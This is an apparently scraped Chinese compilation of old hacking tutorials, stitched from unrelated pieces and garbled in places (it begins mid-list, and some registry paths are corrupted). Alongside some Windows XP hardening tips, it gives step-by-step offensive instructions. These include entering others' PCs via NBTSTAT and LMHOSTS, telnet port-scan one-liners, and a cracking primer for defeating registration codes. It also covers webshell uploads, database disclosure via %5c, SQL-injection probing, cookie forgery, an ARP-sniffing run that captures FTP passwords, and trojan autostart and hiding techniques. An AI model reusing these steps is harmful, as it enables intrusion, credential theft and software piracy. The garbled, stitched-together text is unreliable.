2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。

3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明

4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名

5.开DOS窗口键入 NBTSTAT -R

6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。

以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。

第一招：屏幕保护

在Windows中启用了屏幕保护之后，只要我们离开计算机(或者不操作计算机)的时间达到预设的时间，系统就会自动启动屏幕保护程序，而当用户移动鼠标或敲击键盘想返回正常工作状态时，系统就会打开一个密码确认框，只有输入正确的密码之后才能返回系统，不知道密码的用户将无法进入工作状态，从而保护了数据的安全。

提示：部分设计不完善的屏幕保护程序没有屏蔽系统的“Ctrl+Alt+Del”的组合键，因此需要设置完成之后测试一下程序是否存在这个重大Bug。

不过，屏幕保护最快只能在用户离开1分钟之后自动启动，难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗?其实我们只要打开Windows安装目录里面的system子目录，然后找到相应的屏幕保护程序(扩展名是SCR)，按住鼠标右键将它们拖曳到桌面上，选择弹出菜单中的“在当前位置创建快捷方式”命令，在桌面上为这些屏幕保护程序建立一个快捷方式。

此后，我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。

第二招：巧妙隐藏硬盘

在“按Web页”查看方式下，进入Windows目录时都会弹出一句警告信息，告诉你这是系统文件夹如果“修改该文件夹的内容可能导致程序运行不正常，要查看该文件夹的内容，请单击显示文件”，这时单击“显示文件”就可以进入该目录了。

原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下(由于这两个文件是隐藏文件，之前必须在文件夹选项中单击“查看”标签，选择“显示所有文件”，这样就可以看见这两个文件了)。再按“F5”键刷新一下，看看发生了什么，是不是和进入Windows目录时一样。

接下来我们用“记事本”打开folder.htt，这是用HTML语言编写的一个文件，发挥你的想像力尽情地修改吧。

如果你不懂HTML语言也没关系，先找到“显示文件”将其删除，找到“修改该文件夹的内可能导致程序运行不正常，要查看该文件夹的内容，请单击显示文件”，将其改为自己喜欢的文字，例如“安全重地，闲杂人等请速离开”。

将“要查看该文件夹的内容，请单击”改为“否则，后果自负!”，接着向下拖动滑块到倒数第9行，找到“(file：//%TEMPLATEDIR% /wvlogo.gif)”这是显示警告信息时窗口右下角齿轮图片的路径，将其改为自己图片的路径，例如用“d: /tupian/tupian1.jpg”替换“//”后面的内容，记住这里必须将图片的后缀名打出，否则将显示不出图片。

当然，你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果，然后只要将原文件拷贝到下面这段文字的后面，覆盖掉原文件中“～”之间的内容就可以了。

*ThisfilewasautomaticallygeneratedbyMicrosoftInternetEXPlorer5.0
*usingthefile%THISDIRPATH%/folder.htt.
 

保存并退出，按“F5”键刷新一下，是不是很有个性?接下来要作的就是用“超级兔子”将你所要的驱动器隐藏起来，不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的，就是干脆将folder.htt原文件中“～”之间的内容全部删除，这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象，使其中的文件更安全。

第三招：禁用“开始”菜单命令

在Windows2000/XP中都集成了组策略的功能，通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的安全性。运行“开始→运行”命令，在“运行”对话框的“打开”栏中输入“gpedit.msc”，然后单击“确定”按钮即可启动WindowsXP组策略编辑器。

在“本地计算机策略”中，逐级展开“用户配置→管理模板→任务栏和开始菜单”分支，在右侧窗口中提供了“任务栏”和“开始菜单”的有关策略。

在禁用“开始”菜单命令的时候，在右侧窗口中，提供了删除“开始”菜单中的公用程序组、“我的文档”图标、“文档”菜单、“网上邻居”图标等策略。清理“开始”菜单的时候只要将不需要的菜单项所对应的策略启用即可，比如以删除“我的文档”图标为例，具体操作步骤为：

1)在策略列表窗口中用鼠标双击“从开始菜单中删除我的文档图标”选项。

2)在弹出窗口的“设置”标签中，选择“已启用”单选按钮，然后单击“确定”即可。

第四招：桌面相关选项的禁用

WindowsXP的桌面就像你的办公桌一样，有时需要进行整理和清洁。有了组策略编辑器之后，这项工作将变得易如反掌，只要在“本地计算机策略”中展开“用户配置→管理模板→桌面”分支，即可在右侧窗口中显示相应的策略选项。

1)隐藏桌面的系统图标

倘若隐藏桌面上的系统图标，传统的方法是通过采用修改注册表的方式来实现，这势必造成一定的风险性，采用组策略编辑器，即可方便快捷地达到此目的。

若要隐藏桌面上的“网上邻居”和“InternetEXPlorer”图标，只要在右侧窗口中将“隐藏桌面上网上邻居图标”和“隐藏桌面上的 InternetEXPlorer图标”两个策略选项启用即可。如果隐藏桌面上的所有图标，只要将“隐藏和禁用桌面上的所有项目”启用即可。

当启用了“删除桌面上的我的文档图标”和“删除桌面上的我的电脑图标”两个选项以后，“我的电脑”和“我的文档”图标将从你的电脑桌面上消失了。如果在桌面上你不再喜欢“回收站”这个图标，那么也可以把它给删除，具体方法是将“从桌面删除回收站”策略项启用。

2)禁止对桌面的某些更改

如果你不希望别人随意改变计算机桌面的设置，请在右侧窗口中将“退出时不保存设置”这个策略选项启用。当你启用这个了设置以后，其他用户可以对桌面做某些更改，但有些更改，诸如图标和打开窗口的位置、任务栏的位置及大小在用户注销后都无法保存。

第五招：禁止访问“控制面板”

如果你不希望其他用户访问计算机的控制面板，你只要运行组策略编辑器，并在左侧窗口中展开“本地计算机策略→用户配置→管理模板→控制面板”分支，然后将右侧窗口的“禁止访问控制面板”策略启用即可。

此项设置可以防止控制面板程序文件的启动，其结果是他人将无法启动控制面板或运行任何控制面板项目。另外，这个设置将从“开始”菜单中删除控制面板，同时这个设置还从Windows资源管理器中删除控制面板文件夹。

提示：如果你想从上下文菜单的属性项目中选择一个“控制面板”项目，会出现一个消息，说明该设置防止这个操作。

第六招：设置用户权限

当多人共用一台计算机时，在WindowsXP中设置用户权限，可以按照以下步骤进行：

1)运行组策略编辑器程序。

2)在编辑器窗口的左侧窗口中逐级展开“计算机配置→Windows设置→安全设置→本地策略→用户权限指派”分支。

3)双击需要改变的用户权限，单击“添加用户或组”按钮，然后双击想指派给权限的用户账号，最后单击“确定”按钮退出。

第七招：文件夹设置审核

WindowsXP可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件，而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的安全。为文件和文件夹设置审核的步骤如下：

1)在组策略窗口中，逐级展开右侧窗口中的“计算机配置→Windows设置→安全设置→本地策略”分支，然后在该分支下选择“审核策略”选项。

2)在右侧窗口中用鼠标双击“审核对象访问”选项。

3)用鼠标右键单击想要审核的文件或文件夹，选择弹出菜单的“属性”命令，接着在弹出的窗口中选择“安全”标签。

4)单击“高级”按钮，然后选择“审核”标签。

5)根据具体情况选择你的操作：

倘若对一个新组或用户设置审核，可以单击“添加”按钮，并且在“名称”框中键入新用户名，然后单击“确定”按钮打开“审核项目”对话框。

要查看或更改原有的组或用户审核，可以选择用户名，然后单击“查看/编辑”按钮。

要删除原有的组或用户审核，可以选择用户名，然后单击“删除”按钮即可。

6)如有必要的话，在“审核项目”对话框中的“应用到”列表中选取你希望审核的地方。

7)如果想禁止目录树中的文件和子文件夹继承这些审核项目，选择“仅对此容器内的对象和/或容器应用这些审核项”复选框。

注意：必须是管理员组成员或在组策略中被授权有“管理审核和安全日志”权限的用户可以审核文件或文件夹。在WindowsXP审核文件、文件夹之前，你必须启用组策略中“审核策略”的“审核对象访问”。否则，当你设置完文件、文件夹审核时会返回一个错误消息，并且文件、文件夹都没有被审核。

不需要任何工具,dos命令扫描一个网段的全部端口!
　　在win2000下开一个dos窗口，然后执行
for /l %a in (1,1,254) do start /min /low telnet 192.168.0.%a 3389
这样192.168.0.x这个段的所有开放3389端口得主机都会暴露
这条命令执行后
会在任务栏开254个小窗口
然后telnet链接失败的窗口会在大约5秒后自动退出
剩下的窗口就是相对应开放端口的主机了
看一下小窗口的标题可以得知主机的ip地址
如果你觉得机器性能很好的话 可以把/low参数去了

现在扫描一台主机的多个端口，如下
for /l %a in (1,1,65535) do start /low /min telnet 192.168.0.1%a
这样就扫描192.168.0.1的1到65535端口

现在扫描一个网段的所有端口
for /l %a in (1,1,254) do for /l %b in (1,1,65535) do start /low/min telnet 192.168.0.%a %b
这样就会扫描192.168.0.x段的全部1到65535段口

以上命令只能在win2000下使用，因为/l累加参数是win2000对for的扩展 ,当然winXP和win.NET都可以用，winME我没有试过，因为没有winME的机器

所谓断点就是程序被中断的地方，这个词对于解密者来说是再熟悉不过了。那么什么又是中断呢？中断就是由于有特殊事件（中断事件）发生，计算机暂停当前的任务（即程序），转而去执行另外的任务（中断服务程序），然后再返回原先的任务继续执行。打个比方：你正在上班，突然有同学打电话告诉你他从外地坐火车过来，要你去火车站接他。然后你就向老板临时请假，赶往火车站去接同学，接着将他安顿好，随后你又返回公司继续上班，这就是一个中断过程。我们解密的过程就是等到程序去获取我们输入的注册码并准备和正确的注册码相比较的时候将它中断下来，然后我们通过分析程序，找到正确的注册码。所以我们需要为被解密的程序设置断点，在适当的时候切入程序内部，追踪到程序的注册码，从而达到crack的目的。

2. 领空：

这是个非常重要的概念，但是也初学者是常常不明白的地方。我们在各种各样的破解文章里都能看到领空这个词，如果你搞不清楚到底程序的领空在哪里，那么你就不可能进入破解的大门。或许你也曾破解过某些软件，但那只是瞎猫碰到死老鼠而已（以前我就是这样的^_^,现在说起来都不好意思喔！）。所谓程序的领空，说白了就是程序自己的地方，也就是我们要破解的程序自己程序码所处的位置。也许你马上会问：我是在程序运行的时候设置的断点，为什么中断后不是在程序自己的空间呢？因为每个程序的编写都没有固定的模式，所以我们要在想要切入程序的时候中断程序，就必须不依赖具体的程序设置断点，也就是我们设置的断点应该是每个程序都会用到的东西。在DOS时代，基本上所有的程序都是工作在中断程序之上的，即几乎所有的DOS程序都会去调用各种中断来完成任务。但是到了WINDOWS时代，程序没有权力直接调用中断，WINDOWS系统提供了一个系统功能调用平台（API），就向DOS程序以中断程序为基础一样，WINDOWS程序以API为基础来实现和系统打交道，从而各种功能，所以WINDWOS下的软件破解其断点设置是以API函数为基础的，即当程序调用某个API函数时中断其正常运行，然后进行解密。例如在SOFTICE中设置下面的断点：bpx GetDlgItemText（获取对话框文本），当我们要破解的程序要读取输入的数据而调用GetDlgItemText时，立即被SOFTICE拦截到，从而被破解的程序停留在GetDlgItemText的程序区，而GetDlgItemText是处于WINDWOS自己管理的系统区域，如果我们擅自改掉这部分的程序代码，那就大祸临头了^_^！所以我们要从系统区域返回到被破解程序自己的地方（即程序的领空），才能对程序进行破解，至于怎样看程序的领空请看前面的SOFTICE图解。试想一下：对于每个程序都会调用的程序段，我们可能从那里找到什么有用的东西吗？（怎么样去加密是程序自己决定的，而不是调用系统功能实现的！）

3. API：

即Application Programming Interface的简写，中文叫应用程序编程接口，是一个系统定义函数的大集合，它提供了访问操作系统特征的方法。 API包含了几百个应用程序调用的函数，这些函数执行所有必须的与操作系统相关的操作，如内存分配、向屏幕输出和创建窗口等，用户的程序通过调用API接口同WINDOWS打交道，无论什么样的应用程序，其底层最终都是通过调用各种API函数来实现各种功能的。通常API有两中基本形式：Win16和Win32。 Win16是原来的、API的16位版本，用于Windows 3.1；Win32是现在的、API的32位版本，用于Windows 95/98/NT/ME/2000。Win32包括了Win16，是Win16的超集，大多数函数的名字、用法都是相同的。16位的API函数和32位的 API函数的区别在于最后的一个字母，例如我们设置这样的断点：bpx GetDlgItemText、bpx GetDlgItemTextA和bpx GetDlgItemTextW，其中 GetDlgItemText是16位API函数，GetDlgItemTextA和GetDlgItemTextW是32位API函数，而 GetDlgItemTextA表示函数使用单字节，GetDlgItemTextW表示函数使用双字节。现在我们破解中常用到的是Win32单字节 API函数，就是和GetDlgItemTextA类似的函数，其它的两种（Win16 API和Win32双字节API函数）则比较少见。 Win32 API函数包含在动态链接库（Dynamic Link Libraries，简称DLLs）中，即包含在kernel32.dll、user32.dll、gdi32.dll和comctl32.dll中，这就是为什么我们要在softice中用exp=C:/windows/system/kernel32.dll等命令行将这些动态链接库导入 softice中的原因。因为不这样做的话，我们就无法拦截到系统Win32 API函数调用了。

4. 关于程序中注册码的存在方式：

破解过程中我们都会去找程序中将输入的注册码和正确的注册码相比较的地方，然后通过对程序的跟踪、分析找到正确的注册码。但是正确的注册码通常在程序中以两种形态存在：显式的和隐式的，对于显式存在的注册码，我们可以直接在程序所处的内存中看到它，例如你可以直接在SOFTICE的数据窗口中看到类似"297500523"这样存在的注册码（这里是随意写的），对于注册码显式存在的软件破解起来比较容易；但是有些软件的程序中并不会直接将我们输入的注册码和正确的注册码进行比较，比如有可能将注册码换算成整数、或是将注册码拆开，然后将每一位注册码分开在不同的地方逐一进行比较，或者是将我们输入的注册码进行某种变换，再用某个特殊的程序进行验证等等。总之，应用程序会采取各种不同的复杂运算方式来回避直接的注册码比较，对于这类程序，我们通常要下功夫去仔细跟踪、分析每个程序功能，找到加密算法，然后才能破解它，当然这需要一定的8086汇编编程功底和很大的耐心与精力。

5. 关于软件的破解方式：

本人将破解方式分为两大类，即完全破解和暴力破解。所谓完全破解主要是针对那些需要输入注册码或密码等软件来说的，如果我们能通过对程序的跟踪找到正确的注册码，通过软件本身的注册功能正常注册了软件，这样的破解称之为完全破解；但如果有些软件本身没有提供注册功能，只是提供试用（DEMO），或是注册不能通过软件本身进行（例如需要获取另外一个专用的注册程序，通过INTERNET的注册等等），或者是软件本身的加密技术比较复杂，软件破解者的能力、精力、时间有限，不能直接得到正确的注册码，此时我们需要去修改软件本身的程序码。

6. 关于破解教程中程序代码地址问题：

破解教程中都会放上一部分程序代码以帮助讲解程序的分析方法，例如下面的一段程序代码：

......
0167:00408033　PUSH　00
0167:00408035　PUSH　EBX
0167:00408036　CALL　[USER32!EndDialog]
0167:0040803C　JMP　0040812C
      ......
 

在这里程序中的代码地址如0167:00408033，其代码段的值（即0167）有可能根据不同的电脑会有区别，不一定一模一样，但偏移值应该是固定的（即00408033不变），所以如果看到破解文章里的程序代码的地址值和自己的电脑里不一样，不要以为搞错地方了，只要你的程序代码正确就不会有问题。

　　1 上传漏洞，这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗，利用上传漏洞可以直接得到WEBSHELL，危害等级超级高，现在的入侵中上传漏洞也是常见的漏洞。

　　怎样利用:在网站的地址栏中网址后加上/upfile.asp如果显示 上传格式不正确[重新上传] 这样的字样8成就是有长传漏洞了找个可以上传的工具直接可以得到WEBSHELL。

　　工具介绍:上传工具，老兵的上传工具、DOMAIN3.5，这两个软件都可以达到上传的目的，用NC也可以提交。

　　WEBSHELL是什么:WEBSHELL在上节课简单的介绍了下，许多人都不理解，这里就详细讲下，其实 WEBSHELL并不什么深奥的东西，是个WEB的权限，可以管理WEB，修改主页内容等权限，但是并没有什么特别高的权限，(这个看管理员的设置了)一般修改别人主页大多都需要这个权限，接触过WEB木马的朋友可能知道(比如老兵的站长助手就是WEB木马 海阳2006也是 WEB木马)我们上传漏洞最终传的就是这个东西，有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。

　　2 暴库:这个漏洞现在很少见了，但是还有许多站点有这个漏洞可以利用，暴库就是提交字符得到数据库文件，得到了数据库文件我们就直接有了站点的前台或者后台的权限了。

　　暴库方法:比如一个站的地址为 http://www.xxx.com/dispbbs.asp?boardID=7&ID=161，我门就可以把com/dispbbs中间的/换成%5c，如果有漏洞直接得到数据库的绝对路径，用寻雷什么的下载下来就可以了。还有种方法就是利用默认的数据库路径http://www.xxx.com/后面加上conn.asp。如果没有修改默认的数据库路径也可以得到数据库的路径(注意:这里的/也要换成%5c)。

　　为什么换成%5c:因为在ASCII码里/等于%5c，有时碰到数据库名字为/#abc.mdb的为什么下不了? 这里需要把#号换成%23就可以下载了，为什么我暴出的数据库文件是以。ASP结尾的?我该怎么办?这里可以在下载时把.ASP换成.MDB 这样就可以下载了如果还下载不了可能作了防下载。

　　3 注入漏洞:这个漏洞是现在应用最广泛，杀伤力也很大的漏洞，可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严禁所造成的，可以得到管理员的帐号密码等相关资料。

　　怎样利用:我先介绍下怎样找漏洞比如这个网址 http://www.xxx.com/dispbbs.asp?boardID=7&ID=161 后面是以ID=数字形式结尾的站我们可以手动在后面加上个 and 1=1 看看 如果显示正常页面 再加上个and 1=2 来看看 如果返回正常页面说明没有漏洞 如果返回错误页面说明存在注入漏洞。如果加and 1=1 返回错误页面说明也没有漏洞，知道了站点有没有漏洞我门就可以利用了 可以手工来猜解也可以用工具现在工具比较多(NBSI NDSI 啊D DOMAIN等)都可以用来猜解帐号密码，因为是菜鸟接触，我还是建议大家用工具，手工比较烦琐。

　　4 旁注:我们入侵某站时可能这个站坚固的无懈可击，我们可以找下和这个站同一服务器的站点，然后在利用这个站点用提权，嗅探等方法来入侵我们要入侵的站点。打个形象的比喻，比如你和我一个楼，我家很安全，而你家呢，却漏洞百出，现在有个贼想入侵我家，他对我家做了监视(也就是扫描)发现没有什么可以利用的东西，那么这个贼发现你家和我家一个楼，你家很容易就进去了，他可以先进入你家，然后通过你家得到整个楼的钥匙(系统权限)，这样就自然得到我的钥匙了，就可以进入我的家(网站)。

　　工具介绍:还是名小子的DOMIAN3.5不错的东西，可以检测注入，可以旁注，还可以上传!

　　5 COOKIE诈骗:许多人不知道什么是COOKIE，COOKIE是你上网时由网站所为你发送的值记录了你的一些资料，比如IP，姓名什么的。

　　怎样诈骗呢?如果我们现在已经知道了XX站管理员的站号和MD5密码了，但是破解不出来密码(MD5是加密后的一个16位的密码)我们就可以用COOKIE诈骗来实现，把自己的ID修改成管理员的，MD5密码也修改成他的，有工具可以修改COOKIE 这样就答到了COOKIE诈骗的目的，系统以为你就是管理员了。

第一步:
tracert 61.139.1.1

C:/WIN2000/system32>tracert 61.139.1.1

Tracing route to HACK-4FJ7EARC [61.139.1.1]
over a maximum of 30 hops:

1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1]

Trace complete.

这就说明了你想攻击的主机和你所在的主机在一个关网中那么就有可能
进行ARPSNIFFER了

第二步:看本机IP设置和网卡情况
C:/WIN2000/system32>ipconfig /all

Windows 2000 IP Configuration

Host Name . . . . . . . . . . . . : smscomputer
Primary DNS Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection
Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 61.139.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 61.139.1.65
DNS Servers . . . . . . . . . . . : 61.139.1.73

说明只有一块网卡那么在执行ARPSNIFFER的时候就可以不要第五个参数了这个地
方小榕的主页可没有说哟,经过测试我发觉如果只有一块网卡你第五个参数使用0
的话也只能嗅探到通过自已的数据哟.
从上面我们还可以知道网关是61.139.1.65

第三步:查看本机时间
C:/WIN2000/system32>net time //127.0.0.1

//127.0.0.1 的当前时间是 2003/1/28 下午 09:13

命令完成成功

要注意的是这儿的时间是12小时式,用at命令应要24小时式

第四步:编写启动ARPsniffer的bat文件
C:/WIN2000/system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:/winnt/a.bat

注意咯我们没有要第五个参数,如果有多个网卡的话你就要先直接执行arpsniffer显示如下:
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security@vip.sina.com

Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter
Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数)

Usage: ArpSniffer [/RESET]

第五步:后台运行开始嗅探咯
C:/winnt/system32>at //127.0.0.1 20:44 c:/winnt/a.bat

注意:这儿的时间要用24小时式
arpsniffer最好拷到system32目录下,记录文件也会生成在这儿
执行完第四步要先安装WINPCAP 2.1驱动
同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子

第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉
以SYSTEM权限启动的ARPSniffer程序
C:/winnt/system32>pulist
...................
conime.exe 248 NT AUTHORITY/SYSTEM
explorer.exe 1864 SMSCOMPUTER/Administrator
CSRSS.EXE 2256 NT AUTHORITY/SYSTEM
Arpsniffer.exe 2322 NT AUTHORITY/SYSTEM ----就是它了!
WINLOGON.EXE 2344 NT AUTHORITY/SYSTEM
......................

杀了它
C:/winnt/system32>pskill 2322
PsKill v1.03 - local and remote process killer
Copyright (C) 2000 Mark Russinovich
http://www.sysinternals.com

Process 2322 killed.

C:/winnt/system32>type 1.txt 我的例子中嗅探的是FTP密码:)

...............
61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.139.1.79(21)->61.188.218.179(1404)221
61.139.1.79(21)->61.188.218.179(1404)221
............
............

特别要注意的就是PASS哈:)

----------------------------------------------------
付录:
前台正常执行的显示

C:/>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset

ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security@vip.sina.com

Network Adapter 0: Intel(R) 8255x Based Network Connection

Enable IP Router....OK

Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02
Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb
Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6

Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88
Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88
有时这儿要先显示can not open driver(0)不管它等一下就可以了
Begin Sniffer.........

什么是特洛伊木马?

“特洛伊木马”（trojan horse）简称“木马”，据说这个名称来源于希腊神话《木马屠城记》。古希腊有大军围攻特洛伊城，久久无法攻下。于是有人献计制造一只高二丈的大木马，假装作战马神，让士兵藏匿于巨大的木马中，大部队假装撤退而将木马摈弃于特洛伊城下。城中得知解围的消息后，遂将“木马”作为奇异的战利品拖入城内，全城饮酒狂欢。到午夜时分，全城军民尽入梦乡，匿于木马中的将士开秘门游绳而下，开启城门及四处纵火，城外伏兵涌入，部队里应外合，焚屠特洛伊城。后世称这只大木马为“特洛伊木马”。如今黑客程序借用其名，有“一经潜入，后患无穷”之意。

完整的木马程序一般由两个部份组成：一个是服务器程序，一个是控制器程序。“中了木马”就是指安装了木马的服务器程序，若你的电脑被安装了服务器程序，则拥有控制器程序的人就可以通过网络控制你的电脑、为所欲为，这时你电脑上的各种文件、程序，以及在你电脑上使用的帐号、密码就无安全可言了。

木马程序不能算是一种病毒，但越来越多的新版的杀毒软件，已开始可以查杀一些木马了，所以也有不少人称木马程序为黑客病毒。

详解木马原理

介绍特洛伊木马程序的原理、特征以及中了木马后系统出现的情况……

特洛伊木马是如何启动的

作为一个优秀的木马，自启动功能是必不可少的，这样可以保证木马不会因为你的一次关机操作而彻底失去作用。正因为该项技术如此重要，所以，很多编程人员都在不停地研究和探索新的自启动技术，并且时常有新的发现。一个典型的例子就是把木马加入到用户经常执行的程序 (例如explorer.exe)中，用户执行该程序时，则木马自动发生作用。当然，更加普遍的方法是通过修改Windows系统文件和注册表达到目的，现经常用的方法主要有以下几种:

1.在Win.ini中启动

　　在Win.ini的[windows]字段中有启动命令"load＝"和"run＝"，在一般情况下 "＝"后面是空白的，如果有后跟程序，比方说是这个样子：

run=c:/windows/file.exe
load=c:/windows/file.exe
 

要小心了，这个file.exe很可能是木马哦。

2.在System.ini中启动

System.ini位于Windows的安装目录下，其[boot]字段的shell=Explorer.exe是木马喜欢的隐藏加载之所，木马通常的做法是将该何变为这样:shell=Explorer.exefile.exe。注意这里的file.exe就是木马服务端程序!

另外，在System.中的[386Enh]字段，要注意检查在此段内的"driver＝路径/程序名"这里也有可能被木马所利用。再有，在System.ini中的[mic]、[drivers]、[drivers32]这3个字段，这些段也是起到加载驱动程序的作用，但也是增添木马程序的好场所，现在你该知道也要注意这里喽。

3.利用注册表加载运行

如下所示注册表位置都是木马喜好的藏身加载之所，赶快检查一下，有什么程序在其下。

4.在Autoexec.bat和Config.sys中加载运行

请大家注意，在C盘根目录下的这两个文件也可以启动木马。但这种加载方式一般都需要控制端用户与服务端建立连接后，将己添加木马启动命令的同名文件上传到服务端覆盖这两个文件才行，而且采用这种方式不是很隐蔽。容易被发现，所以在Autoexec.bat和Confings中加载木马程序的并不多见，但也不能因此而掉以轻心。

5.在Winstart.bat中启动

Winstart.bat是一个特殊性丝毫不亚于Autoexec.bat的批处理文件，也是一个能自动被Windows加载运行的文件。它多数情况下为应用程序及Windows自动生成，在执行了Windows自动生成，在执行了Win.com并加截了多数驱动程序之后

开始执行 (这一点可通过启动时按F8键再选择逐步跟踪启动过程的启动方式可得知)。由于Autoexec.bat的功能可以由Witart.bat代替完成，因此木马完全可以像在Autoexec.bat中那样被加载运行，危险由此而来。

6.启动组

木马们如果隐藏在启动组虽然不是十分隐蔽，但这里的确是自动加载运行的好场所，因此还是有木马喜欢在这里驻留的。启动组对应的文件夹为C:/Windows/start menu/programs/startup,在注册表中的位置: HKEY_CURRENT_USER/Software/Microsoft/windows/CurrentVersion/Explorer/shellFolders Startup="c:/windows/start menu/programs/startup"。要注意经常检查启动组哦!

7.*.INI

即应用程序的启动配置文件，控制端利用这些文件能启动程序的特点，将制作好的带有木马启动命令的同名文件上传到服务端覆盖这同名文件，这样就可以达到启动木马的目的了。只启动一次的方式:在winint.ini.中(用于安装较多)。

8.修改文件关联

修改文件关联是木马们常用手段 (主要是国产木马，老外的木马大都没有这个功能)，比方说正常情况下TXT文件的打开方式为Notepad.EXE文件，但一旦中了文件关联木马，则txt文件打开方式就会被修改为用木马程序打开，如著名的国产木马冰河就是这样干的. "冰河"就是通过修改HKEY_CLASSES_ROOT/txtfile/whell/open/command下的键值，将“C: /WINDOWS/NOTEPAD.EXE本应用Notepad打开，如著名的国产HKEY一CLASSES一ROOT/txt闹 e/shell/open/commandT的键值，将 "C:/WINDOWS/NOTEPAD.EXE%l"改为 "C:/WINDOWS/SYSTEM/SYSEXPLR.EXE%l"，这样，一旦你双击一个TXT文件，原本应用Notepad打开该文件，现在却变成启动木马程序了，好狠毒哦!请大家注意，不仅仅是TXT文件，其他诸如HTM、EXE、ZIP.COM等都是木马的目标，要小心搂。

对付这类木马，只能经常检查HKEY_C/shell/open/command主键，查看其键值是否正常。

9.捆绑文件

实现这种触发条件首先要控制端和服务端已通过木马建立连接，然后控制端用户用工具软件将木马文件和某一应用程序捆绑在一起，然后上传到服务端覆盖源文件，这样即使木马被删除了，只要运行捆绑了木马的应用程序，木马义会安装上去。绑定到某一应用程序中，如绑定到系统文件，那么每一次Windows启动均会启动木马。

10.反弹端口型木马的主动连接方式

反弹端口型木马我们已经在前面说过了，由于它与一般的木马相反，其服务端 (被控制端)主动与客户端 (控制端)建立连接，并且监听端口一般开在80，所以如果没有合适的工具、丰富的经验真的很难防范。这类木马的典型代表就是网络神偷"。由于这类木马仍然要在注册表中建立键值注册表的变化就不难查到它们。同时，最新的天网防火墙(如我们在第三点中所讲的那样)，因此只要留意也可在网络神偷服务端进行主动连接时发现它。

木马的隐藏方式

1.在任务栏里隐藏

这是最基本的隐藏方式。如果在windows的任务栏里出现一个莫名其妙的图标，傻子都会明白是怎么回事。要实现在任务栏中隐藏在编程时是很容易实现的。我们以VB为例。在VB中，只要把from的Visible属性设置为False,ShowInTaskBar设为False程序就不会出现在任务栏里了。

2.在任务管理器里隐藏

查看正在运行的进程最简单的方法就是按下Ctrl+Alt+Del时出现的任务管理器。如果你按下Ctrl+Alt+Del后可以看见一个木马程序在运行，那么这肯定不是什么好木马。所以，木马会千方百计地伪装自己，使自己不出现在任务管理器里。木马发现把自己设为 "系统服务“就可以轻松地骗过去。

因此，希望通过按Ctrl+Alt+Del发现木马是不大现实的。

3.端口

一台机器有65536个端口，你会注意这么多端口么?而木马就很注意你的端口。如果你稍微留意一下，不难发现，大多数木马使用的端口在1024以上，而且呈越来越大的趋势;当然也有占用1024以下端口的木马，但这些端口是常用端口，占用这些端口可能会造成系统不正常，这样的话，木马就会很容易暴露。也许你知道一些木马占用的端口，你或许会经常扫描这些端口，但现在的木马都提供端口修改功能，你有时间扫描65536个端口么?

4.隐藏通讯

隐藏通讯也是木马经常采用的手段之一。任何木马运行后都要和攻击者进行通讯连接，或者通过即时连接，如攻击者通过客户端直接接人被植人木马的主机;或者通过间接通讯。如通过电子邮件的方式，木马把侵入主机的敏感信息送给攻击者。现在大部分木马一般在占领主机后会在1024以上不易发现的高端口上驻留;有一些木马会选择一些常用的端口，如80、23,有一种非常先进的木马还可以做到在占领80HTTP端口后，收到正常的HTTP请求仍然把它交与Web服务器处理，只有收到一些特殊约定的数据包后，才调用木马程序。

5.隐藏隐加载方式

